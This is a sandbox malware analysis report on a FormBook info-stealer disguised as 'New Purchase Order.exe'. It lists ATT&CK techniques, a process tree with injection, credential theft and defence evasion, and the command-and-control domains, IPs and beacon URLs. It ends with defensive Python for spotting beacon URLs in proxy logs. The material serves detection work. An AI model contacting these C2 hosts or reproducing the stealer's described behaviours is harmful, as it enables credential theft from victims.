Source: Yara match | File source: 00000010.00000002.3379021381.0000000002F50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2393013278.00000000024F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph ID: 1512971 | Sample: New Purchase Order.exe | Startdate: 18/09/2024 | Architecture: WINDOWS | Score: 100

Contacted domains: www.nevsehir-nakliyat.xyz (Performs DNS queries to domains with low reputation), www.nosr.net, 11 other IPs or domains
Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 11 other signatures

Process tree (reconstructed from the behavior graph):
• New Purchase Order.exe (started)
  • Dropped: C:\Users\user\AppData\Roaming\hbaiQWstL.exe (PE32); C:\Users\...\hbaiQWstL.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpBCD4.tmp (XML); C:\Users\user\...\New Purchase Order.exe.log (ASCII)
  • Signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
  • New Purchase Order.exe (started)
    • Signature: Maps a DLL or memory area into another process
    • SguBfrlSDIFxPr.exe (injected)
      • Signature: Found direct / indirect Syscall (likely to bypass EDR)
      • setupugc.exe (started)
        • Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
        • SguBfrlSDIFxPr.exe (injected)
          • Network: nosr.net 82.221.128.183, ports 49723, 80, THORDC-ASIS Iceland; www.complexity.pub 217.160.0.127, ports 57951, 57952, 57953, ONEANDONE-ASBrauerstrasse48DE Germany; 4 other IPs or domains
          • Signature: Found direct / indirect Syscall (likely to bypass EDR)
        • firefox.exe (started)
  • powershell.exe (started)
    • Signature: Loading BitLocker PowerShell Module
    • WmiPrvSE.exe (started)
    • conhost.exe (started)
  • powershell.exe (started)
    • conhost.exe (started)
  • schtasks.exe (started)
    • conhost.exe (started)
• hbaiQWstL.exe (started)
  • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  • schtasks.exe (started)
    • conhost.exe (started)
  • hbaiQWstL.exe (started)

Source | Detection | Scanner | Label
New Purchase Order.exe | 33% | Virustotal |
New Purchase Order.exe | 19% | ReversingLabs |
New Purchase Order.exe | 100% | Avira | HEUR/AGEN.1306097
New Purchase Order.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\hbaiQWstL.exe | 100% | Avira | HEUR/AGEN.1306097
C:\Users\user\AppData\Roaming\hbaiQWstL.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\hbaiQWstL.exe | 29% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\hbaiQWstL.exe | 33% | Virustotal |

No Antivirus matches

Source | Detection | Scanner | Label
nosr.net | 0% | Virustotal |
angelenterprise.biz | 1% | Virustotal |
dns.ladipage.com | 0% | Virustotal |
www.complexity.pub | 1% | Virustotal |
www.dyme.tech | 0% | Virustotal |
www.nevsehir-nakliyat.xyz | 1% | Virustotal |
www.masteriocp.online | 1% | Virustotal |
natroredirect.natrocdn.com | 0% | Virustotal |
www.angelenterprise.biz | 0% | Virustotal |
www.monos.shop | 0% | Virustotal |
www.nosr.net | 0% | Virustotal |

Source | Detection | Scanner | Label
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
http://www.masteriocp.online/wg84/ | 2% | Virustotal |
http://www.angelenterprise.biz/efkd/ | 0% | Avira URL Cloud | safe
http://www.nevsehir-nakliyat.xyz/csz1/?np=B1/oNyROsiSyJWt29sj2S0IFRvICl+iEjDCW2TmJGWt8WTZ/bsR6m46aAGz/4MK8zBu+cRD9UFqoGBqEMg6eGqtyx0Ndpfqa25N0T4jVP+zcs/aWlws8PlhiBv+1+sYYzcOzaf0=&O4s0=7rrhM | 0% | Avira URL Cloud | safe
http://www.kryto.top/09dt/ | 0% | Avira URL Cloud | safe
http://www.masteriocp.online/wg84/ | 0% | Avira URL Cloud | safe
http://www.complexity.pub/4c7j/ | 0% | Avira URL Cloud | safe
https://www.masteriocp.online/wg84/?np=xCESFhhZDtyM/hr//j3ky1xZxbv/w7yscVTptQKfPtsk1ZKvJSltY0eiWzxDT | 0% | Avira URL Cloud | safe
http://www.nosr.net/ujbu/?O4s0=7rrhM&np=MTTknThtRCJj0ATwznqj01o1Cri3+JPfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLk94tH9MdVpcC/d4hhj8l3F2/cR0CQHBzLt4ZWoJ62kMu+v5Sa8M= | 0% | Avira URL Cloud | safe
http://www.nevsehir-nakliyat.xyz/csz1/ | 0% | Avira URL Cloud | safe
http://www.angelenterprise.biz/efkd/?np=IufelbUCTKOeuwMC8EUMZp6RlpEgAJDIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7lhYpBivnSDbaB35/ERUm/0qpp+YY+ZI0WrG4EzYBf/iASgSBweg=&O4s0=7rrhM | 0% | Avira URL Cloud | safe
http://www.complexity.pub/4c7j/?O4s0=7rrhM&np=hrEH6McWLCF5pgA68gNL2x/WHVd3zz4Lu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW74id0uvrTjdsIz/rLBcjWUYSu3cGevEH/eSJ/+YdconAbopgpETc= | 0% | Avira URL Cloud | safe
http://www.complexity.pub/4c7j/ | 2% | Virustotal |
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | 0% | Avira URL Cloud | safe
http://www.nevsehir-nakliyat.xyz/csz1/ | 1% | Virustotal |
http://www.masteriocp.online/wg84/?np=xCESFhhZDtyM/hr//j3ky1xZxbv/w7yscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiJL1tOfgyOKUOFFDpBfdN6WGkZZw760Atp7sDgLoyqrjSo8Yq8vY=&O4s0=7rrhM | 0% | Avira URL Cloud | safe
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign= | 0% | Avira URL Cloud | safe
http://www.angelenterprise.biz | 0% | Avira URL Cloud | safe
http://www.kryto.top/09dt/?np=rbfG5gS9WKSJFi6SRtlEG1H5qgha+qyBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFY+8px5RXtAkGOTa83eEXxiWZoc8O/jqsRPGTy32XZb2ldw74hvQ=&O4s0=7rrhM | 0% | Avira URL Cloud | safe
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | 0% | Virustotal |
http://www.angelenterprise.biz | 0% | Virustotal |
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign= | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
nosr.net | 82.221.128.183 | true | true | | unknown
angelenterprise.biz | 3.33.130.190 | true | true | | unknown
dns.ladipage.com | 13.228.81.39 | true | true | | unknown
www.complexity.pub | 217.160.0.127 | true | true | | unknown
www.dyme.tech | 13.248.169.48 | true | true | | unknown
www.kryto.top | 162.0.213.94 | true | true | | unknown
natroredirect.natrocdn.com | 85.159.66.93 | true | true | | unknown
www.monos.shop | unknown | unknown | true | | unknown
www.nosr.net | unknown | unknown | true | | unknown
www.nevsehir-nakliyat.xyz | unknown | unknown | true | | unknown
www.masteriocp.online | unknown | unknown | true | | unknown
www.angelenterprise.biz | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.kryto.top/09dt/ | true | Avira URL Cloud: safe | unknown
http://www.masteriocp.online/wg84/ | true | 2%, Virustotal; Avira URL Cloud: safe | unknown
http://www.nevsehir-nakliyat.xyz/csz1/?np=B1/oNyROsiSyJWt29sj2S0IFRvICl+iEjDCW2TmJGWt8WTZ/bsR6m46aAGz/4MK8zBu+cRD9UFqoGBqEMg6eGqtyx0Ndpfqa25N0T4jVP+zcs/aWlws8PlhiBv+1+sYYzcOzaf0=&O4s0=7rrhM | true | Avira URL Cloud: safe | unknown
http://www.angelenterprise.biz/efkd/ | true | Avira URL Cloud: safe | unknown
http://www.complexity.pub/4c7j/ | true | 2%, Virustotal; Avira URL Cloud: safe | unknown
http://www.nosr.net/ujbu/?O4s0=7rrhM&np=MTTknThtRCJj0ATwznqj01o1Cri3+JPfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLk94tH9MdVpcC/d4hhj8l3F2/cR0CQHBzLt4ZWoJ62kMu+v5Sa8M= | true | Avira URL Cloud: safe | unknown
http://www.nevsehir-nakliyat.xyz/csz1/ | true | 1%, Virustotal; Avira URL Cloud: safe | unknown
http://www.angelenterprise.biz/efkd/?np=IufelbUCTKOeuwMC8EUMZp6RlpEgAJDIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7lhYpBivnSDbaB35/ERUm/0qpp+YY+ZI0WrG4EzYBf/iASgSBweg=&O4s0=7rrhM | true | Avira URL Cloud: safe | unknown
http://www.complexity.pub/4c7j/?O4s0=7rrhM&np=hrEH6McWLCF5pgA68gNL2x/WHVd3zz4Lu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW74id0uvrTjdsIz/rLBcjWUYSu3cGevEH/eSJ/+YdconAbopgpETc= | true | Avira URL Cloud: safe | unknown
http://www.masteriocp.online/wg84/?np=xCESFhhZDtyM/hr//j3ky1xZxbv/w7yscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiJL1tOfgyOKUOFFDpBfdN6WGkZZw760Atp7sDgLoyqrjSo8Yq8vY=&O4s0=7rrhM | true | Avira URL Cloud: safe | unknown
http://www.kryto.top/09dt/?np=rbfG5gS9WKSJFi6SRtlEG1H5qgha+qyBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFY+8px5RXtAkGOTa83eEXxiWZoc8O/jqsRPGTy32XZb2ldw74hvQ=&O4s0=7rrhM | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/chrome_newtab | setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.masteriocp.online/wg84/?np=xCESFhhZDtyM/hr//j3ky1xZxbv/w7yscVTptQKfPtsk1ZKvJSltY0eiWzxDT | setupugc.exe, 00000011.00000002.3379647495.000000000468C000.00000004.10000000.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000002.3379292512.000000000335C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | setupugc.exe, 00000011.00000002.3379647495.000000000481E000.00000004.10000000.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000002.3379292512.00000000034EE000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign= | setupugc.exe, 00000011.00000002.3379647495.0000000004044000.00000004.10000000.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000002.3379292512.0000000002D14000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2689415276.0000000039C64000.00000004.80000000.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://www.angelenterprise.biz | SguBfrlSDIFxPr.exe, 00000014.00000002.3381064714.0000000004DB3000.00000040.80000000.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | New Purchase Order.exe, 00000000.00000002.2165111682.0000000002EED000.00000004.00000800.00020000.00000000.sdmp, hbaiQWstL.exe, 0000000A.00000002.2312499541.000000000351D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
162.0.213.94 | www.kryto.top | Canada | 35893 | ACPCA | true
82.221.128.183 | nosr.net | Iceland | 50613 | THORDC-ASIS | true
217.160.0.127 | www.complexity.pub | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
13.228.81.39 | dns.ladipage.com | United States | 16509 | AMAZON-02US | true
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | true
3.33.130.190 | angelenterprise.biz | United States | 8987 | AMAZONEXPANSIONGB | true
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1512971
              Start date and time:2024-09-18 09:01:07 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 10m 11s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:24
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:2
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:New Purchase Order.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@23/16@8/6
              EGA Information:
              • Successful, ratio: 83.3%
              HCA Information:
              • Successful, ratio: 93%
              • Number of executed functions: 124
              • Number of non-executed functions: 311
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:01:57 | API Interceptor | 1x Sleep call for process: New Purchase Order.exe modified
03:01:59 | API Interceptor | 32x Sleep call for process: powershell.exe modified
03:02:03 | API Interceptor | 1x Sleep call for process: hbaiQWstL.exe modified
03:03:00 | API Interceptor | 2441707x Sleep call for process: setupugc.exe modified
09:02:00 | Task Scheduler | Run new task: hbaiQWstL path: C:\Users\user\AppData\Roaming\hbaiQWstL.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
162.0.213.94 | invoice.exe | malicious | FormBook | www.syvra.xyz/h2bb/
162.0.213.94 | r9856_7.exe | malicious | FormBook | www.zimra.xyz/knrh/
162.0.213.94 | PO#86637.exe | malicious | FormBook | www.syvra.xyz/h2bb/
162.0.213.94 | New Purchase Order.exe | malicious | FormBook | www.kryto.top/09dt/?lt=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&3ry=nj20Xr
162.0.213.94 | Scan 00093847.exe | malicious | FormBook | www.kryto.top/09dt/
162.0.213.94 | Quote #011698.exe | malicious | FormBook | www.syvra.xyz/h2bb/
162.0.213.94 | PO#86637.exe | malicious | FormBook | www.syvra.xyz/h2bb/
162.0.213.94 | PO#86637.exe | malicious | FormBook | www.syvra.xyz/h2bb/
162.0.213.94 | 0XLuA614VK.exe | malicious | FormBook | www.rigintech.info/ig9u/
162.0.213.94 | RFQ- PNOC- MR 29215 - PJ 324 AL SAILIYA MOSQUE Project.exe | malicious | FormBook | www.zyfro.info/hnng/
82.221.128.183 | New Purchase Order.exe | malicious | FormBook | www.nosr.net/ujbu/?lt=MTTknThtRCJj0AT/2nqFymBldeCJp6XfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLl6MWH88cVp441dEYiiIl3QDYLx1FQH1mC88=&3ry=nj20Xr
82.221.128.183 | Facturas_Pagadas_al_Vencimiento.PDF.exe | malicious | FormBook | www.secure-clients-page.com/kbov/?ybbYU=lIAaItybSDBgNkcb&xXQ-=WEDk22hUkMefI4h+KOuvD7SFNVkSBOjZ9ow7zFWwR5ytm66LlPqoMBwBmzvxbX8tg1rDdnHradXEOWkZgCuoxSccrvBk7Fqcyg==
82.221.128.183 | presupuesto_PDF.exe | malicious | FormBook | www.secure-clients-page.com/kbov/?Ix4CZrj=WEDk22hUkMefI4h+KOuvD7SFNVkSBOjZ9ow7zFWwR5ytm66LlPqoMBwBmzvxbX8tg1rDdnHradXEOWkZgCuoxSccrvBk7Fqcyg==&5Q=ig4viG0aegUg0XIH
217.160.0.127 | New Purchase Order.exe | malicious | FormBook | www.complexity.pub/4c7j/?3ry=nj20Xr&lt=hrEH6McWLCF5pgA15gNtwiWGYg9JkAgLu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW75lpPuubSjdIy5/XyCdXWUNnJg8HZvEzqXDM=
217.160.0.127 | Scan 00093847.exe | malicious | FormBook | www.complexity.pub/4c7j/
217.160.0.127 | TF1--90.AE.473- ARCA.exe | malicious | FormBook | www.complexity.pub/1a9l/
217.160.0.127 | PJS-4021339 IND.exe | malicious | FormBook | www.complexity.pub/1a9l/?sjxt=xcJry0nATrgPz3s36D+DOY5ekYU8biyZdas4OE33gPLDnSNbS35En5uwC9LoXFyiXOn0vEVdDXXLnDr8V4+Innl6LQCNpnI4Om4T44/YbFCKR+QJ9w==&af0Ll=b83H
217.160.0.127 | REQUEST FOR QUOTATION.exe | malicious | FormBook, GuLoader | www.complexity.pub/4c7j/
217.160.0.127 | Tender_24910.exe | malicious | FormBook | www.complexity.pub/1a9l/
217.160.0.127 | Atlas Copco- WEPCO.exe | malicious | FormBook | www.complexity.pub/1a9l/
217.160.0.127 | SecuriteInfo.com.Trojan.AutoIt.1430.6102.4229.exe | malicious | FormBook | www.complexity.pub/1a9l/
217.160.0.127 | item que precis#U00e1vamos.exe | malicious | FormBook | www.xn--adlerbergrsse-rmb8f.com/gn27/?y6td9N=AV0xlbNpYPfX7490&5jMt_6W=/xQadSu05KLJmftF0h54nQl5Tyx1RcUtgeaGInW1KJq4GFMJERUTzU13IZ77P2vqUMWj
217.160.0.127 | boleto de pagamento.exe | malicious | FormBook | www.xn--adlerbergrsse-rmb8f.com/gn27/?v6=gJBP9Jq0ihlD00_p&R48x=/xQadSu05KLJmftF0h54nQl5Tyx1RcUtgeaGInW1KJq4GFMJERUTzU13IZ7RQGfqQOej
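The three URLs the context table attributes to this sample (on www.kryto.top, www.nosr.net and www.complexity.pub) share one shape: a four-character directory, one long base64-like parameter (lt) that differs per request, and one short parameter (3ry=nj20Xr) that is identical on all three hosts. That static parameter is the cheapest pivot between the domains. The Python below is an added example written for this page, not code from Joe Sandbox or from the report: it parses URLs of that shape, groups them by static parameter, and applies the same check to constructed proxy-log lines. The log layout, the 32-character length cut-off and the four-character path regex are assumptions drawn from these three URLs only, so treat a purely structural match as a hunting lead rather than a signature.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# The three C2 URLs the report's context table attributes to this sample.
REPORT_URLS = [
    "www.kryto.top/09dt/?lt=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&3ry=nj20Xr",
    "www.nosr.net/ujbu/?lt=MTTknThtRCJj0AT/2nqFymBldeCJp6XfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLl6MWH88cVp441dEYiiIl3QDYLx1FQH1mC88=&3ry=nj20Xr",
    "www.complexity.pub/4c7j/?3ry=nj20Xr&lt=hrEH6McWLCF5pgA15gNtwiWGYg9JkAgLu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW75lpPuubSjdIy5/XyCdXWUNnJg8HZvEzqXDM=",
]

# Constructed proxy-log lines: "timestamp client method url status".
# Assumption: this simple space-separated layout; adapt split_log_line() to yours.
SAMPLE_PROXY_LOG = [
    "2024-09-18T07:02:31Z 10.0.0.5 GET http://www.kryto.top/09dt/?lt=" + "A" * 96 + "&3ry=nj20Xr 200",
    "2024-09-18T07:02:40Z 10.0.0.5 GET https://www.ecosia.org/newtab/ 200",
    "2024-09-18T07:03:02Z 10.0.0.7 GET http://www.example-shop.test/abcd/?3ry=nj20Xr&lt=" + "B" * 96 + " 200",
    "2024-09-18T07:03:15Z 10.0.0.9 GET http://other.test/zz99/?q=" + "C" * 96 + "&x=1 200",
    "2024-09-18T07:03:20Z 10.0.0.9 GET http://cdn.example.test/static/app.js?v=20240918 200",
]

PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")  # four-character directory, as in /09dt/, /ujbu/, /4c7j/ (assumption: general)
BLOB_MIN_LEN = 32                          # assumption: the per-request payload is always long


def split_url(url):
    """Return (host, path, query dict). Query values are kept raw: the '+', '/'
    and '=' inside the base64-like blob must not be URL-decoded."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    query = {}
    for piece in parts.query.split("&"):
        if piece:
            key, _, value = piece.partition("=")
            query[key] = value
    return parts.hostname, parts.path, query


def classify_params(query):
    """Split a query into the long per-request blob(s) and the short static token(s)."""
    blob = {k: v for k, v in query.items() if len(v) >= BLOB_MIN_LEN}
    static = {k: v for k, v in query.items() if len(v) < BLOB_MIN_LEN}
    return blob, static


def pivot_by_static_param(urls):
    """Group hosts by the short, unchanging query parameter so that one token
    ties together every domain a campaign used."""
    groups = defaultdict(list)
    for url in urls:
        host, path, query = split_url(url)
        if not PATH_RE.match(path):
            continue
        _, static = classify_params(query)
        for key, value in sorted(static.items()):
            groups[f"{key}={value}"].append(host)
    return dict(groups)


def looks_like_beacon(url):
    """Structural heuristic: short directory, exactly one long blob, one short token."""
    _, path, query = split_url(url)
    if not PATH_RE.match(path):
        return False
    blob, static = classify_params(query)
    return len(blob) == 1 and len(static) == 1


def split_log_line(line):
    fields = line.split()
    return fields[3] if len(fields) > 3 else ""


def flag_proxy_log(lines, known_static):
    """Return (host, reason) for each line that reuses a known static token or
    merely has the beacon shape; the first is an IOC hit, the second a lead."""
    hits = []
    for line in lines:
        url = split_log_line(line)
        if not url:
            continue
        host, _, query = split_url(url)
        _, static = classify_params(query)
        if any(f"{k}={v}" in known_static for k, v in static.items()):
            hits.append((host, "known static token"))
        elif looks_like_beacon(url):
            hits.append((host, "beacon-shaped URL"))
    return hits


if __name__ == "__main__":
    tokens = pivot_by_static_param(REPORT_URLS)
    print(tokens)
    for hit in flag_proxy_log(SAMPLE_PROXY_LOG, set(tokens)):
        print(hit)
```

Run against this report's URLs the pivot yields a single token, 3ry=nj20Xr, carrying all three hosts; that token is what to search proxy history for first. The shape heuristic fires on the constructed other.test line as well, which is the intended behaviour for a lead but would also catch benign short-path URLs, so do not promote it to a blocking rule without tuning.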
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.dyme.tech | New Purchase Order.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | Scan 00093847.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | doc330391202408011.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | PO #86637.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | REQST_PRC 410240665_2024.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | REQST_PRC 410240.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | COTIZACION 290824.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | REQUEST FOR QUOTATION.exe | malicious | FormBook, GuLoader | 13.248.169.48
www.dyme.tech | INVG0088 LHV3495264 BL327291535V.exe | malicious | FormBook | 13.248.169.48
www.dyme.tech | DHL AWB TRACKING DETAILS.exe | malicious | FormBook | 13.248.169.48
www.complexity.pub | New Purchase Order.exe | malicious | FormBook | 217.160.0.127
www.complexity.pub | Scan 00093847.exe | malicious | FormBook | 217.160.0.127
www.complexity.pub | TF1--90.AE.473- ARCA.exe | malicious | FormBook | 217.160.0.127
www.complexity.pub | PJS-4021339 IND.exe | malicious | FormBook | 217.160.0.127
www.complexity.pub | REQUEST FOR QUOTATION.exe | malicious | FormBook, GuLoader | 217.160.0.127
